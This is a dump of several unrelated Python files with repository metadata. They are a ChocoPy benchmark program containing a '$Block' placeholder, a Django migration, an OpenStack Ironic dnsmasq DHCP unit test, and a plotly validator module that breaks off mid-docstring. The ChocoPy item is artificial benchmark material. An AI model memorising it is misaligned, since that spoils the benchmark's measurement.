ddbf3edc9d3761abdb1aadc07c33a7eef98fd2b1
[]
no_license
Virtlink/ccbench-chocopy
c3f7f6af6349aff6503196f727ef89f210a1eac8
c7efae43bf32696ee2b2ee781bdfe4f7730dec3f
refs/heads/main
2023-04-07T15:07:12.464038
2022-02-03T15:42:39
2022-02-03T15:42:39
451,969,776
0
0
null
null
null
null
UTF-8
Python
false
false
13,176
py
count:int = 0 count2:int = 0 count3:int = 0 count4:int = 0 count5:int = 0 def foo(s: str) -> int: return len(s) def foo2(s: str, s2: str) -> int: return len(s) def foo3(s: str, s2: str, s3: str) -> int: return len(s) def foo4(s: str, s2: str, s3: str, s4: str) -> int: return len(s) def foo5(s: str, s2: str, s3: str, s4: str, s5: str) -> int: return len(s) class bar(object): p: bool = True def baz(self:"bar", xx: [int]) -> str: global count x:int = 0 y:int = 1 def qux(y: int) -> object: nonlocal x if x > y: x = -1 for x in xx: self.p = x == 2 qux(0) # Yay! ChocoPy count = count + 1 while x <= 0: if self.p: xx[0] = xx[1] self.p = not self.p x = x + 1 elif foo("Long"[0]) == 1: self.p = self is None return "Nope" class bar2(object): p: bool = True p2: bool = True def baz(self:"bar2", xx: [int]) -> str: global count x:int = 0 y:int = 1 def qux(y: int) -> object: nonlocal x if x > y: x = -1 for x in xx: self.p = x == 2 qux(0) # Yay! ChocoPy count = count + 1 while x <= 0: if self.p: xx[0] = xx[1] self.p = not self.p x = x + 1 elif foo("Long"[0]) == 1: self.p = self is None return "Nope" def baz2(self:"bar2", xx: [int], xx2: [int]) -> str: global count x:int = 0 x2:int = 0 y:int = 1 y2:int = 1 def qux(y: int) -> object: nonlocal x if x > y: x = -1 def qux2(y: int, y2: int) -> object: nonlocal x nonlocal x2 if x > y: x = -1 for x in xx: self.p = x == 2 qux(0) # Yay! ChocoPy count = count + 1 while x <= 0: if self.p: xx[0] = xx[1] self.p = not self.p x = x + 1 elif foo("Long"[0]) == 1: self.p = self is None return "Nope" class bar3(object): p: bool = True p2: bool = True p3: bool = True def baz(self:"bar3", xx: [int]) -> str: global count x:int = 0 y:int = 1 def qux(y: int) -> object: nonlocal x if x > y: x = -1 for x in xx: self.p = x == 2 qux(0) # Yay! 
ChocoPy count = count + 1 while x <= 0: $Block return "Nope" def baz2(self:"bar3", xx: [int], xx2: [int]) -> str: global count x:int = 0 x2:int = 0 y:int = 1 y2:int = 1 def qux(y: int) -> object: nonlocal x if x > y: x = -1 def qux2(y: int, y2: int) -> object: nonlocal x nonlocal x2 if x > y: x = -1 for x in xx: self.p = x == 2 qux(0) # Yay! ChocoPy count = count + 1 while x <= 0: if self.p: xx[0] = xx[1] self.p = not self.p x = x + 1 elif foo("Long"[0]) == 1: self.p = self is None return "Nope" def baz3(self:"bar3", xx: [int], xx2: [int], xx3: [int]) -> str: global count x:int = 0 x2:int = 0 x3:int = 0 y:int = 1 y2:int = 1 y3:int = 1 def qux(y: int) -> object: nonlocal x if x > y: x = -1 def qux2(y: int, y2: int) -> object: nonlocal x nonlocal x2 if x > y: x = -1 def qux3(y: int, y2: int, y3: int) -> object: nonlocal x nonlocal x2 nonlocal x3 if x > y: x = -1 for x in xx: self.p = x == 2 qux(0) # Yay! ChocoPy count = count + 1 while x <= 0: if self.p: xx[0] = xx[1] self.p = not self.p x = x + 1 elif foo("Long"[0]) == 1: self.p = self is None return "Nope" class bar4(object): p: bool = True p2: bool = True p3: bool = True p4: bool = True def baz(self:"bar4", xx: [int]) -> str: global count x:int = 0 y:int = 1 def qux(y: int) -> object: nonlocal x if x > y: x = -1 for x in xx: self.p = x == 2 qux(0) # Yay! ChocoPy count = count + 1 while x <= 0: if self.p: xx[0] = xx[1] self.p = not self.p x = x + 1 elif foo("Long"[0]) == 1: self.p = self is None return "Nope" def baz2(self:"bar4", xx: [int], xx2: [int]) -> str: global count x:int = 0 x2:int = 0 y:int = 1 y2:int = 1 def qux(y: int) -> object: nonlocal x if x > y: x = -1 def qux2(y: int, y2: int) -> object: nonlocal x nonlocal x2 if x > y: x = -1 for x in xx: self.p = x == 2 qux(0) # Yay! 
ChocoPy count = count + 1 while x <= 0: if self.p: xx[0] = xx[1] self.p = not self.p x = x + 1 elif foo("Long"[0]) == 1: self.p = self is None return "Nope" def baz3(self:"bar4", xx: [int], xx2: [int], xx3: [int]) -> str: global count x:int = 0 x2:int = 0 x3:int = 0 y:int = 1 y2:int = 1 y3:int = 1 def qux(y: int) -> object: nonlocal x if x > y: x = -1 def qux2(y: int, y2: int) -> object: nonlocal x nonlocal x2 if x > y: x = -1 def qux3(y: int, y2: int, y3: int) -> object: nonlocal x nonlocal x2 nonlocal x3 if x > y: x = -1 for x in xx: self.p = x == 2 qux(0) # Yay! ChocoPy count = count + 1 while x <= 0: if self.p: xx[0] = xx[1] self.p = not self.p x = x + 1 elif foo("Long"[0]) == 1: self.p = self is None return "Nope" def baz4(self:"bar4", xx: [int], xx2: [int], xx3: [int], xx4: [int]) -> str: global count x:int = 0 x2:int = 0 x3:int = 0 x4:int = 0 y:int = 1 y2:int = 1 y3:int = 1 y4:int = 1 def qux(y: int) -> object: nonlocal x if x > y: x = -1 def qux2(y: int, y2: int) -> object: nonlocal x nonlocal x2 if x > y: x = -1 def qux3(y: int, y2: int, y3: int) -> object: nonlocal x nonlocal x2 nonlocal x3 if x > y: x = -1 def qux4(y: int, y2: int, y3: int, y4: int) -> object: nonlocal x nonlocal x2 nonlocal x3 nonlocal x4 if x > y: x = -1 for x in xx: self.p = x == 2 qux(0) # Yay! ChocoPy count = count + 1 while x <= 0: if self.p: xx[0] = xx[1] self.p = not self.p x = x + 1 elif foo("Long"[0]) == 1: self.p = self is None return "Nope" class bar5(object): p: bool = True p2: bool = True p3: bool = True p4: bool = True p5: bool = True def baz(self:"bar5", xx: [int]) -> str: global count x:int = 0 y:int = 1 def qux(y: int) -> object: nonlocal x if x > y: x = -1 for x in xx: self.p = x == 2 qux(0) # Yay! 
ChocoPy count = count + 1 while x <= 0: if self.p: xx[0] = xx[1] self.p = not self.p x = x + 1 elif foo("Long"[0]) == 1: self.p = self is None return "Nope" def baz2(self:"bar5", xx: [int], xx2: [int]) -> str: global count x:int = 0 x2:int = 0 y:int = 1 y2:int = 1 def qux(y: int) -> object: nonlocal x if x > y: x = -1 def qux2(y: int, y2: int) -> object: nonlocal x nonlocal x2 if x > y: x = -1 for x in xx: self.p = x == 2 qux(0) # Yay! ChocoPy count = count + 1 while x <= 0: if self.p: xx[0] = xx[1] self.p = not self.p x = x + 1 elif foo("Long"[0]) == 1: self.p = self is None return "Nope" def baz3(self:"bar5", xx: [int], xx2: [int], xx3: [int]) -> str: global count x:int = 0 x2:int = 0 x3:int = 0 y:int = 1 y2:int = 1 y3:int = 1 def qux(y: int) -> object: nonlocal x if x > y: x = -1 def qux2(y: int, y2: int) -> object: nonlocal x nonlocal x2 if x > y: x = -1 def qux3(y: int, y2: int, y3: int) -> object: nonlocal x nonlocal x2 nonlocal x3 if x > y: x = -1 for x in xx: self.p = x == 2 qux(0) # Yay! ChocoPy count = count + 1 while x <= 0: if self.p: xx[0] = xx[1] self.p = not self.p x = x + 1 elif foo("Long"[0]) == 1: self.p = self is None return "Nope" def baz4(self:"bar5", xx: [int], xx2: [int], xx3: [int], xx4: [int]) -> str: global count x:int = 0 x2:int = 0 x3:int = 0 x4:int = 0 y:int = 1 y2:int = 1 y3:int = 1 y4:int = 1 def qux(y: int) -> object: nonlocal x if x > y: x = -1 def qux2(y: int, y2: int) -> object: nonlocal x nonlocal x2 if x > y: x = -1 def qux3(y: int, y2: int, y3: int) -> object: nonlocal x nonlocal x2 nonlocal x3 if x > y: x = -1 def qux4(y: int, y2: int, y3: int, y4: int) -> object: nonlocal x nonlocal x2 nonlocal x3 nonlocal x4 if x > y: x = -1 for x in xx: self.p = x == 2 qux(0) # Yay! 
ChocoPy count = count + 1 while x <= 0: if self.p: xx[0] = xx[1] self.p = not self.p x = x + 1 elif foo("Long"[0]) == 1: self.p = self is None return "Nope" def baz5(self:"bar5", xx: [int], xx2: [int], xx3: [int], xx4: [int], xx5: [int]) -> str: global count x:int = 0 x2:int = 0 x3:int = 0 x4:int = 0 x5:int = 0 y:int = 1 y2:int = 1 y3:int = 1 y4:int = 1 y5:int = 1 def qux(y: int) -> object: nonlocal x if x > y: x = -1 def qux2(y: int, y2: int) -> object: nonlocal x nonlocal x2 if x > y: x = -1 def qux3(y: int, y2: int, y3: int) -> object: nonlocal x nonlocal x2 nonlocal x3 if x > y: x = -1 def qux4(y: int, y2: int, y3: int, y4: int) -> object: nonlocal x nonlocal x2 nonlocal x3 nonlocal x4 if x > y: x = -1 def qux5(y: int, y2: int, y3: int, y4: int, y5: int) -> object: nonlocal x nonlocal x2 nonlocal x3 nonlocal x4 nonlocal x5 if x > y: x = -1 for x in xx: self.p = x == 2 qux(0) # Yay! ChocoPy count = count + 1 while x <= 0: if self.p: xx[0] = xx[1] self.p = not self.p x = x + 1 elif foo("Long"[0]) == 1: self.p = self is None return "Nope" print(bar().baz([1,2]))
6399568472f674133ea232ed648f413406c0c095
fd15d1a9d0fdf6908bb7c8d1d4490bb6cf817d1f
/CareerFlash/migrations/0012_auto_20190918_0307.py
4a906d6dd1216a9a77ebe27977af08c7ec4755fd
[]
no_license
stanleysh/Career-Flash
8bca183ae2576c0aae7dbdb62c2abd60e8890e6d
6e062afb5ef8959141475e1d73af431a0cf047b4
refs/heads/master
2020-08-05T06:23:26.427944
2019-09-19T17:34:23
2019-09-19T17:34:23
null
0
0
null
null
null
null
UTF-8
Python
false
false
402
py
# Generated by Django 2.2.5 on 2019-09-18 03:07 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('CareerFlash', '0011_orginization'), ] operations = [ migrations.AlterField( model_name='orginization', name='name', field=models.CharField(max_length=255, unique=True), ), ]
cdc243853b5430781b560f6d3f53ceeb14bb4b58
a0447b03ad89a41a5c2e2073e32aeaf4d6279340
/ironic/tests/unit/dhcp/test_dnsmasq.py
64fe46f3393fd13874809d60d2532be93e42bae0
[ "Apache-2.0" ]
permissive
openstack/ironic
2ae87e36d7a62d44b7ed62cad4e2e294d48e061b
ab76ff12e1c3c2208455e917f1a40d4000b4e990
refs/heads/master
2023-08-31T11:08:34.486456
2023-08-31T04:45:05
2023-08-31T04:45:05
10,066,301
411
365
Apache-2.0
2023-07-25T02:05:53
2013-05-14T22:28:24
Python
UTF-8
Python
false
false
5,237
py
# # Copyright 2022 Red Hat, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import os import tempfile from ironic.common import dhcp_factory from ironic.common import utils as common_utils from ironic.conductor import task_manager from ironic.tests.unit.db import base as db_base from ironic.tests.unit.objects import utils as object_utils class TestDnsmasqDHCPApi(db_base.DbTestCase): def setUp(self): super(TestDnsmasqDHCPApi, self).setUp() self.config(dhcp_provider='dnsmasq', group='dhcp') self.node = object_utils.create_test_node(self.context) self.ports = [ object_utils.create_test_port( self.context, node_id=self.node.id, id=2, uuid='1be26c0b-03f2-4d2e-ae87-c02d7f33c782', address='52:54:00:cf:2d:32', pxe_enabled=True)] self.optsdir = tempfile.mkdtemp() self.addCleanup(lambda: common_utils.rmtree_without_raise( self.optsdir)) self.config(dhcp_optsdir=self.optsdir, group='dnsmasq') self.hostsdir = tempfile.mkdtemp() self.addCleanup(lambda: common_utils.rmtree_without_raise( self.hostsdir)) self.config(dhcp_hostsdir=self.hostsdir, group='dnsmasq') dhcp_factory.DHCPFactory._dhcp_provider = None self.api = dhcp_factory.DHCPFactory() self.opts = [ { 'ip_version': 4, 'opt_name': '67', 'opt_value': 'bootx64.efi' }, { 'ip_version': 4, 'opt_name': '210', 'opt_value': '/tftpboot/' }, { 'ip_version': 4, 'opt_name': '66', 'opt_value': '192.0.2.135', }, { 'ip_version': 4, 'opt_name': '150', 'opt_value': '192.0.2.135' }, { 'ip_version': 4, 'opt_name': '255', 'opt_value': '192.0.2.135' } ] 
def test_update_dhcp(self): with task_manager.acquire(self.context, self.node.uuid) as task: self.api.update_dhcp(task, self.opts) dnsmasq_tag = task.node.driver_internal_info.get('dnsmasq_tag') self.assertEqual(36, len(dnsmasq_tag)) hostfile = os.path.join(self.hostsdir, 'ironic-52:54:00:cf:2d:32.conf') with open(hostfile, 'r') as f: self.assertEqual( '52:54:00:cf:2d:32,set:%s,set:ironic\n' % dnsmasq_tag, f.readline()) optsfile = os.path.join(self.optsdir, 'ironic-%s.conf' % self.node.uuid) with open(optsfile, 'r') as f: self.assertEqual([ 'tag:%s,67,bootx64.efi\n' % dnsmasq_tag, 'tag:%s,210,/tftpboot/\n' % dnsmasq_tag, 'tag:%s,66,192.0.2.135\n' % dnsmasq_tag, 'tag:%s,150,192.0.2.135\n' % dnsmasq_tag, 'tag:%s,255,192.0.2.135\n' % dnsmasq_tag], f.readlines()) def test_get_ip_addresses(self): with task_manager.acquire(self.context, self.node.uuid) as task: with tempfile.NamedTemporaryFile() as fp: self.config(dhcp_leasefile=fp.name, group='dnsmasq') fp.write(b"1659975057 52:54:00:cf:2d:32 192.0.2.198 * *\n") fp.flush() self.assertEqual( ['192.0.2.198'], self.api.provider.get_ip_addresses(task)) def test_clean_dhcp_opts(self): with task_manager.acquire(self.context, self.node.uuid) as task: self.api.update_dhcp(task, self.opts) hostfile = os.path.join(self.hostsdir, 'ironic-52:54:00:cf:2d:32.conf') optsfile = os.path.join(self.optsdir, 'ironic-%s.conf' % self.node.uuid) self.assertTrue(os.path.isfile(hostfile)) self.assertTrue(os.path.isfile(optsfile)) with task_manager.acquire(self.context, self.node.uuid) as task: self.api.clean_dhcp(task) # assert the host file remains with the ignore directive, and the opts # file is deleted with open(hostfile, 'r') as f: self.assertEqual( '52:54:00:cf:2d:32,ignore\n', f.readline()) self.assertFalse(os.path.isfile(optsfile))
d1c15709092c258b430c6ded3da4b80b379da6d7
bb1e0e89fcf1f1ffb61214ddf262ba327dd10757
/plotly_study/validators/scattergl/marker/__init__.py
5076833461f161bf0707c189a46671576aba5327
[ "MIT" ]
permissive
lucasiscovici/plotly_py
ccb8c3ced89a0f7eccf1ae98551fa712460033fe
42ab769febb45fbbe0a3c677dc4306a4f59cea36
refs/heads/master
2020-09-12T05:43:12.363609
2019-12-02T15:13:13
2019-12-02T15:13:13
222,328,180
0
0
null
null
null
null
UTF-8
Python
false
false
35,078
py
import _plotly_utils.basevalidators class SymbolsrcValidator(_plotly_utils.basevalidators.SrcValidator): def __init__( self, plotly_name="symbolsrc", parent_name="scattergl.marker", **kwargs ): super(SymbolsrcValidator, self).__init__( plotly_name=plotly_name, parent_name=parent_name, edit_type=kwargs.pop("edit_type", "none"), role=kwargs.pop("role", "info"), **kwargs ) import _plotly_utils.basevalidators class SymbolValidator(_plotly_utils.basevalidators.EnumeratedValidator): def __init__(self, plotly_name="symbol", parent_name="scattergl.marker", **kwargs): super(SymbolValidator, self).__init__( plotly_name=plotly_name, parent_name=parent_name, array_ok=kwargs.pop("array_ok", True), edit_type=kwargs.pop("edit_type", "calc"), role=kwargs.pop("role", "style"), values=kwargs.pop( "values", [ 0, "circle", 100, "circle-open", 200, "circle-dot", 300, "circle-open-dot", 1, "square", 101, "square-open", 201, "square-dot", 301, "square-open-dot", 2, "diamond", 102, "diamond-open", 202, "diamond-dot", 302, "diamond-open-dot", 3, "cross", 103, "cross-open", 203, "cross-dot", 303, "cross-open-dot", 4, "x", 104, "x-open", 204, "x-dot", 304, "x-open-dot", 5, "triangle-up", 105, "triangle-up-open", 205, "triangle-up-dot", 305, "triangle-up-open-dot", 6, "triangle-down", 106, "triangle-down-open", 206, "triangle-down-dot", 306, "triangle-down-open-dot", 7, "triangle-left", 107, "triangle-left-open", 207, "triangle-left-dot", 307, "triangle-left-open-dot", 8, "triangle-right", 108, "triangle-right-open", 208, "triangle-right-dot", 308, "triangle-right-open-dot", 9, "triangle-ne", 109, "triangle-ne-open", 209, "triangle-ne-dot", 309, "triangle-ne-open-dot", 10, "triangle-se", 110, "triangle-se-open", 210, "triangle-se-dot", 310, "triangle-se-open-dot", 11, "triangle-sw", 111, "triangle-sw-open", 211, "triangle-sw-dot", 311, "triangle-sw-open-dot", 12, "triangle-nw", 112, "triangle-nw-open", 212, "triangle-nw-dot", 312, "triangle-nw-open-dot", 13, "pentagon", 113, "pentagon-open", 
213, "pentagon-dot", 313, "pentagon-open-dot", 14, "hexagon", 114, "hexagon-open", 214, "hexagon-dot", 314, "hexagon-open-dot", 15, "hexagon2", 115, "hexagon2-open", 215, "hexagon2-dot", 315, "hexagon2-open-dot", 16, "octagon", 116, "octagon-open", 216, "octagon-dot", 316, "octagon-open-dot", 17, "star", 117, "star-open", 217, "star-dot", 317, "star-open-dot", 18, "hexagram", 118, "hexagram-open", 218, "hexagram-dot", 318, "hexagram-open-dot", 19, "star-triangle-up", 119, "star-triangle-up-open", 219, "star-triangle-up-dot", 319, "star-triangle-up-open-dot", 20, "star-triangle-down", 120, "star-triangle-down-open", 220, "star-triangle-down-dot", 320, "star-triangle-down-open-dot", 21, "star-square", 121, "star-square-open", 221, "star-square-dot", 321, "star-square-open-dot", 22, "star-diamond", 122, "star-diamond-open", 222, "star-diamond-dot", 322, "star-diamond-open-dot", 23, "diamond-tall", 123, "diamond-tall-open", 223, "diamond-tall-dot", 323, "diamond-tall-open-dot", 24, "diamond-wide", 124, "diamond-wide-open", 224, "diamond-wide-dot", 324, "diamond-wide-open-dot", 25, "hourglass", 125, "hourglass-open", 26, "bowtie", 126, "bowtie-open", 27, "circle-cross", 127, "circle-cross-open", 28, "circle-x", 128, "circle-x-open", 29, "square-cross", 129, "square-cross-open", 30, "square-x", 130, "square-x-open", 31, "diamond-cross", 131, "diamond-cross-open", 32, "diamond-x", 132, "diamond-x-open", 33, "cross-thin", 133, "cross-thin-open", 34, "x-thin", 134, "x-thin-open", 35, "asterisk", 135, "asterisk-open", 36, "hash", 136, "hash-open", 236, "hash-dot", 336, "hash-open-dot", 37, "y-up", 137, "y-up-open", 38, "y-down", 138, "y-down-open", 39, "y-left", 139, "y-left-open", 40, "y-right", 140, "y-right-open", 41, "line-ew", 141, "line-ew-open", 42, "line-ns", 142, "line-ns-open", 43, "line-ne", 143, "line-ne-open", 44, "line-nw", 144, "line-nw-open", ], ), **kwargs ) import _plotly_utils.basevalidators class 
SizesrcValidator(_plotly_utils.basevalidators.SrcValidator): def __init__(self, plotly_name="sizesrc", parent_name="scattergl.marker", **kwargs): super(SizesrcValidator, self).__init__( plotly_name=plotly_name, parent_name=parent_name, edit_type=kwargs.pop("edit_type", "none"), role=kwargs.pop("role", "info"), **kwargs ) import _plotly_utils.basevalidators class SizerefValidator(_plotly_utils.basevalidators.NumberValidator): def __init__(self, plotly_name="sizeref", parent_name="scattergl.marker", **kwargs): super(SizerefValidator, self).__init__( plotly_name=plotly_name, parent_name=parent_name, edit_type=kwargs.pop("edit_type", "calc"), role=kwargs.pop("role", "style"), **kwargs ) import _plotly_utils.basevalidators class SizemodeValidator(_plotly_utils.basevalidators.EnumeratedValidator): def __init__( self, plotly_name="sizemode", parent_name="scattergl.marker", **kwargs ): super(SizemodeValidator, self).__init__( plotly_name=plotly_name, parent_name=parent_name, edit_type=kwargs.pop("edit_type", "calc"), role=kwargs.pop("role", "info"), values=kwargs.pop("values", ["diameter", "area"]), **kwargs ) import _plotly_utils.basevalidators class SizeminValidator(_plotly_utils.basevalidators.NumberValidator): def __init__(self, plotly_name="sizemin", parent_name="scattergl.marker", **kwargs): super(SizeminValidator, self).__init__( plotly_name=plotly_name, parent_name=parent_name, edit_type=kwargs.pop("edit_type", "calc"), min=kwargs.pop("min", 0), role=kwargs.pop("role", "style"), **kwargs ) import _plotly_utils.basevalidators class SizeValidator(_plotly_utils.basevalidators.NumberValidator): def __init__(self, plotly_name="size", parent_name="scattergl.marker", **kwargs): super(SizeValidator, self).__init__( plotly_name=plotly_name, parent_name=parent_name, array_ok=kwargs.pop("array_ok", True), edit_type=kwargs.pop("edit_type", "calc"), min=kwargs.pop("min", 0), role=kwargs.pop("role", "style"), **kwargs ) import _plotly_utils.basevalidators class 
ShowscaleValidator(_plotly_utils.basevalidators.BooleanValidator): def __init__( self, plotly_name="showscale", parent_name="scattergl.marker", **kwargs ): super(ShowscaleValidator, self).__init__( plotly_name=plotly_name, parent_name=parent_name, edit_type=kwargs.pop("edit_type", "calc"), role=kwargs.pop("role", "info"), **kwargs ) import _plotly_utils.basevalidators class ReversescaleValidator(_plotly_utils.basevalidators.BooleanValidator): def __init__( self, plotly_name="reversescale", parent_name="scattergl.marker", **kwargs ): super(ReversescaleValidator, self).__init__( plotly_name=plotly_name, parent_name=parent_name, edit_type=kwargs.pop("edit_type", "calc"), role=kwargs.pop("role", "style"), **kwargs ) import _plotly_utils.basevalidators class OpacitysrcValidator(_plotly_utils.basevalidators.SrcValidator): def __init__( self, plotly_name="opacitysrc", parent_name="scattergl.marker", **kwargs ): super(OpacitysrcValidator, self).__init__( plotly_name=plotly_name, parent_name=parent_name, edit_type=kwargs.pop("edit_type", "none"), role=kwargs.pop("role", "info"), **kwargs ) import _plotly_utils.basevalidators class OpacityValidator(_plotly_utils.basevalidators.NumberValidator): def __init__(self, plotly_name="opacity", parent_name="scattergl.marker", **kwargs): super(OpacityValidator, self).__init__( plotly_name=plotly_name, parent_name=parent_name, array_ok=kwargs.pop("array_ok", True), edit_type=kwargs.pop("edit_type", "calc"), max=kwargs.pop("max", 1), min=kwargs.pop("min", 0), role=kwargs.pop("role", "style"), **kwargs ) import _plotly_utils.basevalidators class LineValidator(_plotly_utils.basevalidators.CompoundValidator): def __init__(self, plotly_name="line", parent_name="scattergl.marker", **kwargs): super(LineValidator, self).__init__( plotly_name=plotly_name, parent_name=parent_name, data_class_str=kwargs.pop("data_class_str", "Line"), data_docs=kwargs.pop( "data_docs", """ autocolorscale Determines whether the colorscale is a default palette 
(`autocolorscale: true`) or the palette determined by `marker.line.colorscale`. Has an effect only if in `marker.line.color`is set to a numerical array. In case `colorscale` is unspecified or `autocolorscale` is true, the default palette will be chosen according to whether numbers in the `color` array are all positive, all negative or mixed. cauto Determines whether or not the color domain is computed with respect to the input data (here in `marker.line.color`) or the bounds set in `marker.line.cmin` and `marker.line.cmax` Has an effect only if in `marker.line.color`is set to a numerical array. Defaults to `false` when `marker.line.cmin` and `marker.line.cmax` are set by the user. cmax Sets the upper bound of the color domain. Has an effect only if in `marker.line.color`is set to a numerical array. Value should have the same units as in `marker.line.color` and if set, `marker.line.cmin` must be set as well. cmid Sets the mid-point of the color domain by scaling `marker.line.cmin` and/or `marker.line.cmax` to be equidistant to this point. Has an effect only if in `marker.line.color`is set to a numerical array. Value should have the same units as in `marker.line.color`. Has no effect when `marker.line.cauto` is `false`. cmin Sets the lower bound of the color domain. Has an effect only if in `marker.line.color`is set to a numerical array. Value should have the same units as in `marker.line.color` and if set, `marker.line.cmax` must be set as well. color Sets themarker.linecolor. It accepts either a specific color or an array of numbers that are mapped to the colorscale relative to the max and min values of the array or relative to `marker.line.cmin` and `marker.line.cmax` if set. coloraxis Sets a reference to a shared color axis. References to these shared color axes are "coloraxis", "coloraxis2", "coloraxis3", etc. Settings for these shared color axes are set in the layout, under `layout.coloraxis`, `layout.coloraxis2`, etc. 
Note that multiple color scales can be linked to the same color axis. colorscale Sets the colorscale. Has an effect only if in `marker.line.color`is set to a numerical array. The colorscale must be an array containing arrays mapping a normalized value to an rgb, rgba, hex, hsl, hsv, or named color string. At minimum, a mapping for the lowest (0) and highest (1) values are required. For example, `[[0, 'rgb(0,0,255)'], [1, 'rgb(255,0,0)']]`. To control the bounds of the colorscale in color space, use`marker.line.cmin` and `marker.line.cmax`. Alternatively, `colorscale` may be a palette name string of the following list: Greys,YlGnBu,Greens,YlOrRd,Bluered,RdBu,R eds,Blues,Picnic,Rainbow,Portland,Jet,Hot,Black body,Earth,Electric,Viridis,Cividis. colorsrc Sets the source reference on plot.ly for color . reversescale Reverses the color mapping if true. Has an effect only if in `marker.line.color`is set to a numerical array. If true, `marker.line.cmin` will correspond to the last color in the array and `marker.line.cmax` will correspond to the first color. width Sets the width (in px) of the lines bounding the marker points. widthsrc Sets the source reference on plot.ly for width . 
""", ), **kwargs ) import _plotly_utils.basevalidators class ColorsrcValidator(_plotly_utils.basevalidators.SrcValidator): def __init__( self, plotly_name="colorsrc", parent_name="scattergl.marker", **kwargs ): super(ColorsrcValidator, self).__init__( plotly_name=plotly_name, parent_name=parent_name, edit_type=kwargs.pop("edit_type", "none"), role=kwargs.pop("role", "info"), **kwargs ) import _plotly_utils.basevalidators class ColorscaleValidator(_plotly_utils.basevalidators.ColorscaleValidator): def __init__( self, plotly_name="colorscale", parent_name="scattergl.marker", **kwargs ): super(ColorscaleValidator, self).__init__( plotly_name=plotly_name, parent_name=parent_name, edit_type=kwargs.pop("edit_type", "calc"), implied_edits=kwargs.pop("implied_edits", {"autocolorscale": False}), role=kwargs.pop("role", "style"), **kwargs ) import _plotly_utils.basevalidators class ColorBarValidator(_plotly_utils.basevalidators.CompoundValidator): def __init__( self, plotly_name="colorbar", parent_name="scattergl.marker", **kwargs ): super(ColorBarValidator, self).__init__( plotly_name=plotly_name, parent_name=parent_name, data_class_str=kwargs.pop("data_class_str", "ColorBar"), data_docs=kwargs.pop( "data_docs", """ bgcolor Sets the color of padded area. bordercolor Sets the axis line color. borderwidth Sets the width (in px) or the border enclosing this color bar. dtick Sets the step in-between ticks on this axis. Use with `tick0`. Must be a positive number, or special strings available to "log" and "date" axes. If the axis `type` is "log", then ticks are set every 10^(n*dtick) where n is the tick number. For example, to set a tick mark at 1, 10, 100, 1000, ... set dtick to 1. To set tick marks at 1, 100, 10000, ... set dtick to 2. To set tick marks at 1, 5, 25, 125, 625, 3125, ... set dtick to log_10(5), or 0.69897000433. "log" has several special values; "L<f>", where `f` is a positive number, gives ticks linearly spaced in value (but not position). 
For example `tick0` = 0.1, `dtick` = "L0.5" will put ticks at 0.1, 0.6, 1.1, 1.6 etc. To show powers of 10 plus small digits between, use "D1" (all digits) or "D2" (only 2 and 5). `tick0` is ignored for "D1" and "D2". If the axis `type` is "date", then you must convert the time to milliseconds. For example, to set the interval between ticks to one day, set `dtick` to 86400000.0. "date" also has special values "M<n>" gives ticks spaced by a number of months. `n` must be a positive integer. To set ticks on the 15th of every third month, set `tick0` to "2000-01-15" and `dtick` to "M3". To set ticks every 4 years, set `dtick` to "M48" exponentformat Determines a formatting rule for the tick exponents. For example, consider the number 1,000,000,000. If "none", it appears as 1,000,000,000. If "e", 1e+9. If "E", 1E+9. If "power", 1x10^9 (with 9 in a super script). If "SI", 1G. If "B", 1B. len Sets the length of the color bar This measure excludes the padding of both ends. That is, the color bar length is this length minus the padding on both ends. lenmode Determines whether this color bar's length (i.e. the measure in the color variation direction) is set in units of plot "fraction" or in *pixels. Use `len` to set the value. nticks Specifies the maximum number of ticks for the particular axis. The actual number of ticks will be chosen automatically to be less than or equal to `nticks`. Has an effect only if `tickmode` is set to "auto". outlinecolor Sets the axis line color. outlinewidth Sets the width (in px) of the axis line. separatethousands If "true", even 4-digit integers are separated showexponent If "all", all exponents are shown besides their significands. If "first", only the exponent of the first tick is shown. If "last", only the exponent of the last tick is shown. If "none", no exponents appear. showticklabels Determines whether or not the tick labels are drawn. showtickprefix If "all", all tick labels are displayed with a prefix. 
If "first", only the first tick is displayed with a prefix. If "last", only the last tick is displayed with a suffix. If "none", tick prefixes are hidden. showticksuffix Same as `showtickprefix` but for tick suffixes. thickness Sets the thickness of the color bar This measure excludes the size of the padding, ticks and labels. thicknessmode Determines whether this color bar's thickness (i.e. the measure in the constant color direction) is set in units of plot "fraction" or in "pixels". Use `thickness` to set the value. tick0 Sets the placement of the first tick on this axis. Use with `dtick`. If the axis `type` is "log", then you must take the log of your starting tick (e.g. to set the starting tick to 100, set the `tick0` to 2) except when `dtick`=*L<f>* (see `dtick` for more info). If the axis `type` is "date", it should be a date string, like date data. If the axis `type` is "category", it should be a number, using the scale where each category is assigned a serial number from zero in the order it appears. tickangle Sets the angle of the tick labels with respect to the horizontal. For example, a `tickangle` of -90 draws the tick labels vertically. tickcolor Sets the tick color. tickfont Sets the color bar's tick label font tickformat Sets the tick label formatting rule using d3 formatting mini-languages which are very similar to those in Python. For numbers, see: https://github.com/d3/d3-3.x-api- reference/blob/master/Formatting.md#d3_format And for dates see: https://github.com/d3/d3-3.x-api- reference/blob/master/Time-Formatting.md#format We add one item to d3's date formatter: "%{n}f" for fractional seconds with n digits. 
For example, *2016-10-13 09:15:23.456* with tickformat "%H~%M~%S.%2f" would display "09~15~23.46" tickformatstops A tuple of plotly_study.graph_objects.scattergl.marke r.colorbar.Tickformatstop instances or dicts with compatible properties tickformatstopdefaults When used in a template (as layout.template.dat a.scattergl.marker.colorbar.tickformatstopdefau lts), sets the default property values to use for elements of scattergl.marker.colorbar.tickformatstops ticklen Sets the tick length (in px). tickmode Sets the tick mode for this axis. If "auto", the number of ticks is set via `nticks`. If "linear", the placement of the ticks is determined by a starting position `tick0` and a tick step `dtick` ("linear" is the default value if `tick0` and `dtick` are provided). If "array", the placement of the ticks is set via `tickvals` and the tick text is `ticktext`. ("array" is the default value if `tickvals` is provided). tickprefix Sets a tick label prefix. ticks Determines whether ticks are drawn or not. If "", this axis' ticks are not drawn. If "outside" ("inside"), this axis' are drawn outside (inside) the axis lines. ticksuffix Sets a tick label suffix. ticktext Sets the text displayed at the ticks position via `tickvals`. Only has an effect if 